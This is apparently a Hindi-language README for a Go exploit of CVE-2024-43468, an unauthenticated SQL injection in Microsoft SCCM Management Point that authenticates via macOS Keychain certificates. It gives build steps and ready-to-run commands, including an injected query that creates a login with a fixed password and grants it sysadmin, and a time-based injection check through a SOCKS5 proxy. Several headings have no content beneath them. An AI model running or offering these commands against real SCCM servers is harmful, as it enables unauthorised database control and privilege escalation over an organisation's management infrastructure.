
CVE-2024-43468 SCCM SQL इंजेक्शन एक्सप्लॉइट (MacOS कीचेन संस्करण से mTLS गैर-निकालने योग्य क्लाइंट सर्टिफिकेट)
CVE-2024-43468 शोषण का Go कार्यान्वयन जो mTLS प्रमाणीकरण के लिए macOS कीचेन का उपयोग करता है (कीचेन से कुंजियाँ निर्यात करने की आवश्यकता नहीं है)।
इसके अतिरिक्त:
आधारित:
Microsoft Configuration Manager (ConfigMgr / SCCM) में अप्रमाणित SQL इंजेक्शन का शोषण करता है, जो नेटवर्क पहुँच रखने वाले हमलावर को Management Point पर साइट डेटाबेस में मनमानी SQL क्वेरी निष्पादित करने की अनुमति देता है।
संवेदनशील संस्करण:
# Clone repository
git clone https://github.com/nikallass/CVE-2024-43468_mTLS_go
cd CVE-2024-43468_mTLS_go
# Install dependencies
go get github.com/google/uuid
go get golang.org/x/net/proxy
# Build
go build -o sccm
# Show help
./sccm -h
# Basic usage (creating new admin)
./sccm -t https://sccm-mp.local \
-sql "create login user123 with password = 'Password123'; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin'" \
-cn "CertificateCommonName"
# With custom proxy (check with sleep 5)
./sccm -t https://sccm-mp.local \
-sql "WAITFOR DELAY '0:0:5'" \
-cn "CertificateCommonName" \
-proxy "127.0.0.1:9050"
-t : लक्ष्य URL (आवश्यक)-sql : निष्पादित की जाने वाली SQL क्वेरी (आवश्यक)-cn : macOS कीचेन में प्रमाणपत्र का Common Name (आवश्यक)-proxy : SOCKS5 प्रॉक्सी पता (डिफ़ॉल्ट: खाली)